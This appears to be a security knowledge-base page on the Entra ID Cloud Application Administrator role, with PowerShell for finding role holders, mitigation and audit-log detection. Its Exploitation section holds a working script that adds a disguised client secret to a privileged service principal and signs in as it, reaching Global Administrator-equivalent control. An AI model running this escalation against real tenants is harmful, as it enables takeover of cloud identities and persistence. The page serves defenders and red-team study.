AZ_CLOUD_APP_ADMIN
Summary
FSProtect ACL Alias
AZ_CLOUD_APP_ADMIN
Entra ID (Azure AD) Alias
Cloud Application Administrator
Affected Object Types
App registrations (Applications) & Enterprise applications (Service Principals)
Exploitation Certainty
Certain
Graph Permission / Role
Membership in the Cloud Application Administrator directory role, either by direct assignment or through a role-assignable group, as an active or PIM-eligible assignment. The role can create and manage all aspects of app registrations and enterprise applications, and can grant admin consent to delegated permissions and to application permissions other than Microsoft Graph application permissions. It has the same permissions as Application Administrator except that it cannot manage Application Proxy.
Description
AZ_CLOUD_APP_ADMIN represents the ability for a principal to operate as a Cloud Application Administrator in Microsoft Entra ID.
A Cloud Application Administrator can create and manage all aspects of app registrations and enterprise applications (service principals) in the tenant: credentials, owners, redirect URIs, claims, sign-in configuration, and application permission assignments.
By controlling application objects, an attacker can:
Add credentials (client secrets or certificates) to applications and service principals, authenticate as them, and inherit every permission they already hold.
Modify application configuration that affects authentication and access (redirect URIs, claims, sign-in settings).
Grant admin consent to permissions within the role's limits (Microsoft Graph application permissions are excluded) and expand what an application can do.
Add owners or alter access paths on application objects to establish persistence that survives removal of the original role assignment.
Therefore, any identity that holds the Cloud Application Administrator role can escalate to the privileges of any existing service principal in the tenant by adding a credential to it. Where a service principal already holds a privileged Microsoft Graph application permission such as RoleManagement.ReadWrite.Directory, this yields Global Administrator-equivalent control and sidesteps the role's own consent restriction.
Identification
PowerShell (Microsoft Graph)
List all members of the Cloud Application Administrator role. If a group is assigned, expand it to identify effective users.
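The following is an added example, not code from the original page: it enumerates every effective holder of Cloud Application Administrator using the Microsoft Graph PowerShell SDK, covering active assignments, PIM-eligible assignments, and transitive members of any role-assignable group. The delegated scopes requested and the variable and function names are assumptions for this example; the role template ID is the well-known built-in value.

```powershell
# Added example, not code from the original page: enumerate every effective holder of
# Cloud Application Administrator (active and PIM-eligible), expanding role-assignable groups.
# Requires the Microsoft.Graph PowerShell SDK. Delegated scopes assumed:
# RoleManagement.Read.Directory, RoleEligibilitySchedule.Read.Directory, Directory.Read.All.
Connect-MgGraph -Scopes 'RoleManagement.Read.Directory','RoleEligibilitySchedule.Read.Directory','Directory.Read.All' -NoWelcome

# Role template ID for Cloud Application Administrator; template IDs are identical in every tenant.
$CloudAppAdminTemplateId = '158c047a-c907-4556-b7ef-446551a6b5f7'

function Expand-RolePrincipal {
    # Turns one role principal into rows of effective holders. Groups are expanded
    # transitively so nested membership is not missed; service principals that hold
    # the role are reported as such rather than silently dropped.
    param($Principal, [string]$Kind, [string]$Scope)
    $type = $Principal.AdditionalProperties['@odata.type'] -replace '^#microsoft\.graph\.', ''
    $name = $Principal.AdditionalProperties['displayName']
    if ($type -eq 'group') {
        Get-MgGroupTransitiveMember -GroupId $Principal.Id -All | ForEach-Object {
            [pscustomobject]@{
                Kind = $Kind; Scope = $Scope; Via = "group: $name"
                Type = $_.AdditionalProperties['@odata.type'] -replace '^#microsoft\.graph\.', ''
                Name = $_.AdditionalProperties['displayName']
                Upn  = $_.AdditionalProperties['userPrincipalName']
                Id   = $_.Id
            }
        }
    } else {
        [pscustomobject]@{
            Kind = $Kind; Scope = $Scope; Via = 'direct'; Type = $type; Name = $name
            Upn  = $Principal.AdditionalProperties['userPrincipalName']; Id = $Principal.Id
        }
    }
}

$filter = "roleDefinitionId eq '$CloudAppAdminTemplateId'"
$rows = @()

# Active assignments (direct or via group). DirectoryScopeId '/' is tenant-wide;
# '/administrativeUnits/<id>' means the role is scoped to one administrative unit.
Get-MgRoleManagementDirectoryRoleAssignment -Filter $filter -ExpandProperty Principal -All |
    ForEach-Object { $rows += Expand-RolePrincipal -Principal $_.Principal -Kind 'Active' -Scope $_.DirectoryScopeId }

# PIM-eligible assignments: not members right now, but able to activate the role on demand.
Get-MgRoleManagementDirectoryRoleEligibilityScheduleInstance -Filter $filter -ExpandProperty Principal -All |
    ForEach-Object { $rows += Expand-RolePrincipal -Principal $_.Principal -Kind 'Eligible' -Scope $_.DirectoryScopeId }

$rows | Sort-Object Kind, Name | Format-Table Kind, Type, Name, Upn, Via, Scope -AutoSize
```

Querying roleAssignments rather than directoryRoles/{id}/members is deliberate: the older endpoint only returns the role once it has been activated in the tenant and does not show administrative-unit scope or PIM eligibility. Any row with Type servicePrincipal deserves the same scrutiny as a user, since a service principal holding this role can be driven by whoever holds its credentials.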
Azure CLI (read-only via Microsoft Graph)
Azure CLI has no dedicated Entra role commands. Use az rest to GET the same Microsoft Graph endpoints: roleManagement/directory/roleAssignments filtered on roleDefinitionId eq the role's template ID (158c047a-c907-4556-b7ef-446551a6b5f7), then groups/{id}/transitiveMembers for any group principal returned.
Azure GUI
Microsoft Entra admin center > Identity > Roles & admins > Roles & admins > Cloud Application Administrator. Review Assignments (active) and, where PIM is in use, Eligible assignments; open any group listed to see its members.
Exploitation
A Cloud Application Administrator can take control of application identities. Exploitation is certain in the sense that no misconfiguration is required: the role alone is sufficient. This can be used to gain persistence and expand access.
Common high-impact actions include:
Adding new credentials (client secrets or certificates) to an application or service principal and authenticating as it.
Modifying application configuration (redirect URIs, certificates, claims, sign-in settings, and access assignments).
Granting admin consent to permissions (within role limits: Microsoft Graph application permissions cannot be consented, but service principals that already hold them can still be hijacked through the credential path above).
Assigning or changing owners on application objects.
Treat Cloud Application Administrator as a privileged role, in practice equivalent to the most privileged service principal in the tenant. Do not assign it broadly.
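The credential path, as an added example rather than code from the original page: from a session holding Cloud Application Administrator, find service principals that already hold privileged Microsoft Graph application permissions, add a client secret to one, and sign in as it. The SDK scopes requested, the list of permissions treated as dangerous, and the secret's display name are assumptions for this example; the directory role is what actually authorizes the credential write.

```powershell
# Added example, not code from the original page: locate service principals holding
# privileged Microsoft Graph application permissions, add a client secret to one, sign in as it.
# Operator SDK scopes (assumed): Application.ReadWrite.All, Directory.Read.All.
Connect-MgGraph -Scopes 'Application.ReadWrite.All','Directory.Read.All' -NoWelcome

# Microsoft Graph's own service principal; its appRoles map permission GUIDs to names.
$graphSp  = Get-MgServicePrincipal -Filter "appId eq '00000003-0000-0000-c000-000000000000'"
$roleName = @{}
foreach ($r in $graphSp.AppRoles) { $roleName[[string]$r.Id] = $r.Value }

# Graph application permissions that reach Global Administrator-equivalent control (assumed list).
$dangerous = @('RoleManagement.ReadWrite.Directory', 'AppRoleAssignment.ReadWrite.All',
               'Directory.ReadWrite.All', 'Application.ReadWrite.All', 'PrivilegedAccess.ReadWrite.AzureAD')

# appRoleAssignedTo on the Graph SP lists every principal granted one of its application permissions.
$targets = Get-MgServicePrincipalAppRoleAssignedTo -ServicePrincipalId $graphSp.Id -All |
    Where-Object { $roleName[[string]$_.AppRoleId] -in $dangerous } |
    Select-Object PrincipalDisplayName, PrincipalId, @{ n = 'Permission'; e = { $roleName[[string]$_.AppRoleId] } }
$targets | Format-Table -AutoSize

$victim = $targets | Select-Object -First 1
if (-not $victim) { throw 'No service principal with a privileged Graph application permission was found.' }

# Add a secret to the first hit. This write is what turns role membership into control of the
# service principal; it is logged as "Add service principal credentials" (see Detection).
$cred = Add-MgServicePrincipalPassword -ServicePrincipalId $victim.PrincipalId -PasswordCredential @{
    displayName = 'svc-rotation'                         # constructed; chosen to look routine
    endDateTime = (Get-Date).AddDays(30).ToUniversalTime()
}
# $cred.SecretText is returned exactly once and cannot be read back later.

# Sign in as the service principal: the new session carries its application permissions,
# not the operator's, so the role's consent limits no longer apply.
$tenantId = (Get-MgContext).TenantId
$appId    = (Get-MgServicePrincipal -ServicePrincipalId $victim.PrincipalId).AppId
$secret   = ConvertTo-SecureString $cred.SecretText -AsPlainText -Force
Disconnect-MgGraph | Out-Null
Connect-MgGraph -TenantId $tenantId -ClientSecretCredential ([pscredential]::new($appId, $secret)) -NoWelcome
Get-MgContext | Select-Object AuthType, Scopes        # AuthType AppOnly; Scopes shows the SP's Graph roles
```

Two caveats for anyone reproducing this in a lab: managed-identity service principals do not accept added credentials, so they never appear as viable targets even when they hold dangerous roles; and the search above only covers Microsoft Graph application permissions, so a service principal whose power comes from Azure RBAC or from app roles on another API would be missed unless the query is widened.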
Mitigation
Keep Cloud Application Administrator assignments minimal.
Use PIM:
Prefer eligible assignments.
Require MFA and approvals for activation where appropriate.
Prefer custom roles with scoped application permissions where possible.
Minimize application owners and restrict who can manage credentials for sensitive apps.
Restrict who can grant admin consent and who can manage enterprise applications.
Review application credentials and permissions regularly for high-value apps.
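One technical control behind "restrict who can manage credentials" is a tenant-wide app management policy, shown here as an added example that is not code from the original page. It is enforced on the credential write itself, so it constrains Cloud Application Administrators and app owners alike. Field names follow the Microsoft Graph tenantAppManagementPolicy resource; the cutoff date, the lifetimes, and the scope requested are assumptions for this example.

```powershell
# Added example, not code from the original page: default app management policy that blocks
# new client secrets and caps credential lifetimes for apps created after a cutoff date.
# Delegated scope assumed: Policy.ReadWrite.ApplicationConfiguration.
Connect-MgGraph -Scopes 'Policy.ReadWrite.ApplicationConfiguration' -NoWelcome

$cutoff = '2020-01-01T00:00:00Z'   # assumed: objects created after this date fall under the policy
$restrictions = @{
    passwordCredentials = @(
        # No new client secrets at all: this is the write the Exploitation section relies on.
        @{ restrictionType = 'passwordAddition'; maxLifetime = $null;  restrictForAppsCreatedAfterDateTime = $cutoff }
        # Secrets still permitted elsewhere (e.g. by a per-app exception policy) must expire within 90 days.
        @{ restrictionType = 'passwordLifetime'; maxLifetime = 'P90D'; restrictForAppsCreatedAfterDateTime = $cutoff }
    )
    keyCredentials = @(
        # Certificates can only be lifetime-limited by this policy type, not blocked outright.
        @{ restrictionType = 'asymmetricKeyLifetime'; maxLifetime = 'P365D'; restrictForAppsCreatedAfterDateTime = $cutoff }
    )
}
$policy = @{
    isEnabled                    = $true
    applicationRestrictions      = $restrictions   # app registrations homed in this tenant
    servicePrincipalRestrictions = $restrictions   # service principals, including those of apps homed elsewhere
}

Invoke-MgGraphRequest -Method PATCH -Uri 'https://graph.microsoft.com/v1.0/policies/defaultAppManagementPolicy' -Body $policy

# Read the policy back to confirm what is now enforced.
Invoke-MgGraphRequest -Method GET -Uri 'https://graph.microsoft.com/v1.0/policies/defaultAppManagementPolicy' | ConvertTo-Json -Depth 6
```

Because passwordAddition blocks every new secret, applications that legitimately need one get a custom policy under policies/appManagementPolicies assigned to that application only; the default then covers everything else. The certificate gap is worth stating plainly in the control description: this policy raises the bar for the secret path but does not remove the certificate path, which is why minimizing role holders and alerting on credential writes remain necessary.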
Detection
Monitor Entra audit logs (categories RoleManagement and ApplicationManagement) for role assignment and application management actions. Activity names below are the ActivityDisplayName values as recorded.
Role assignment events:
Add member to role
Add eligible member to role (PIM)
Add member to role completed (PIM activation)
Application change events (high risk):
Add service principal credentials; Update application – Certificates and secrets management
Consent to application; Add delegated permission grant
Add app role assignment to service principal
Add owner to application; Add owner to service principal
Investigate:
Initiated by (actor)
Target resources
Time window and change ticket linkage
Alert on:
New Cloud Application Administrator assignments or activations.
Credential changes on sensitive apps by Cloud Application Administrators.
Consent or permission changes outside approved change windows.
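The triage rules above, as an added example that is not code from the original page: a function that scores one audit record, run over constructed sample records shaped like the objects Get-MgAuditLogDirectoryAudit returns (ActivityDisplayName, InitiatedBy, TargetResources, ActivityDateTime). The sensitive-app watch-list, the change window, and all sample data are constructed for the example.

```powershell
# Added example, not code from the original page: triage Entra audit records for this role.
$CloudAppAdminTemplateId = '158c047a-c907-4556-b7ef-446551a6b5f7'
$SensitiveApps = @('Billing Sync SP')          # constructed watch-list of high-value apps

# ActivityDisplayName values as they appear in Entra audit logs.
$RoleEvents       = @('Add member to role', 'Add eligible member to role', 'Add member to role completed (PIM activation)')
$CredentialEvents = @('Add service principal credentials', 'Update application – Certificates and secrets management')
$ConsentEvents    = @('Consent to application', 'Add app role assignment to service principal', 'Add delegated permission grant')

function Test-CloudAppAdminAuditRecord {
    param($Record, [int]$WindowStartUtc = 8, [int]$WindowEndUtc = 18)   # approved change window, UTC (assumed)
    $activity = $Record.ActivityDisplayName
    $actor    = if ($Record.InitiatedBy.User.UserPrincipalName) { $Record.InitiatedBy.User.UserPrincipalName }
                else { "app:$($Record.InitiatedBy.App.DisplayName)" }
    $targets  = @($Record.TargetResources)
    $names    = ($targets | ForEach-Object { if ($_.UserPrincipalName) { $_.UserPrincipalName } else { $_.DisplayName } }) -join ', '
    $hourUtc  = ([datetime]$Record.ActivityDateTime).ToUniversalTime().Hour
    $inWindow = ($hourUtc -ge $WindowStartUtc) -and ($hourUtc -lt $WindowEndUtc)

    function New-Finding([string]$Severity, [string]$Reason) {
        [pscustomobject]@{ Severity = $Severity; Activity = $activity; Actor = $actor; Targets = $names
                           Time = $Record.ActivityDateTime; Reason = $Reason }
    }

    if ($activity -in $RoleEvents) {
        # Role.TemplateId arrives as a JSON string literal inside modifiedProperties, quotes included.
        $templateIds = @($targets.ModifiedProperties | Where-Object DisplayName -eq 'Role.TemplateId' |
                         ForEach-Object { $_.NewValue.Trim('"') })
        if ($templateIds -contains $CloudAppAdminTemplateId) {
            New-Finding 'High' 'Cloud Application Administrator assignment, eligibility or activation'
        }
        return
    }
    if ($activity -in $CredentialEvents) {
        if ($targets | Where-Object { $_.DisplayName -in $SensitiveApps }) {
            New-Finding 'High' 'Credential added to a sensitive app or service principal'; return
        }
        New-Finding 'Medium' 'Credential change on an application object'
        return
    }
    if ($activity -in $ConsentEvents) {
        if ($inWindow) { New-Finding 'Medium' 'Consent or permission grant in window; confirm change-ticket linkage' }
        else           { New-Finding 'High'   'Consent or permission grant outside the approved change window' }
    }
}

# Constructed sample records (not real tenant data), mirroring the SDK object shape.
$SampleRecords = @(
    [pscustomobject]@{
        ActivityDateTime = '2024-05-02T03:14:00Z'; ActivityDisplayName = 'Add member to role'
        InitiatedBy      = @{ User = @{ UserPrincipalName = 'helpdesk1@contoso.example' } }
        TargetResources  = @([pscustomobject]@{ Type = 'User'; UserPrincipalName = 'j.doe@contoso.example'; DisplayName = 'J. Doe'
            ModifiedProperties = @(
                [pscustomobject]@{ DisplayName = 'Role.DisplayName'; NewValue = '"Cloud Application Administrator"' },
                [pscustomobject]@{ DisplayName = 'Role.TemplateId';  NewValue = '"158c047a-c907-4556-b7ef-446551a6b5f7"' }) })
    },
    [pscustomobject]@{
        ActivityDateTime = '2024-05-02T03:16:00Z'; ActivityDisplayName = 'Add service principal credentials'
        InitiatedBy      = @{ User = @{ UserPrincipalName = 'j.doe@contoso.example' } }
        TargetResources  = @([pscustomobject]@{ Type = 'ServicePrincipal'; DisplayName = 'Billing Sync SP'; ModifiedProperties = @() })
    },
    [pscustomobject]@{
        ActivityDateTime = '2024-05-02T10:00:00Z'; ActivityDisplayName = 'Consent to application'
        InitiatedBy      = @{ User = @{ UserPrincipalName = 'appadmin@contoso.example' } }
        TargetResources  = @([pscustomobject]@{ Type = 'ServicePrincipal'; DisplayName = 'HR Portal'; ModifiedProperties = @() })
    },
    [pscustomobject]@{
        ActivityDateTime = '2024-05-02T11:30:00Z'; ActivityDisplayName = 'Update user'
        InitiatedBy      = @{ User = @{ UserPrincipalName = 'helpdesk1@contoso.example' } }
        TargetResources  = @([pscustomobject]@{ Type = 'User'; UserPrincipalName = 'a.b@contoso.example'; ModifiedProperties = @() })
    }
)

$SampleRecords | ForEach-Object { Test-CloudAppAdminAuditRecord $_ } | Format-Table Severity, Activity, Actor, Targets, Time -AutoSize

# Live tenant (delegated scope AuditLog.Read.All), e.g. the last day:
# Get-MgAuditLogDirectoryAudit -Filter "activityDateTime ge 2024-05-01T00:00:00Z" -All |
#     ForEach-Object { Test-CloudAppAdminAuditRecord $_ }
```

Reading the sample output in sequence is the point: a Cloud Application Administrator assignment at 03:14 by a helpdesk account, followed two minutes later by the new holder adding a credential to a watch-listed service principal, is the pattern this page describes, and correlating on the actor of the second event being the target of the first is the cheapest way to turn two medium-confidence alerts into one high-confidence incident.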
References
https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/delegate-app-roles
https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference
https://learn.microsoft.com/en-us/graph/api/directoryrole-list-members?view=graph-rest-1.0
https://learn.microsoft.com/en-us/graph/api/directoryrole-list?view=graph-rest-1.0
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-audit-logs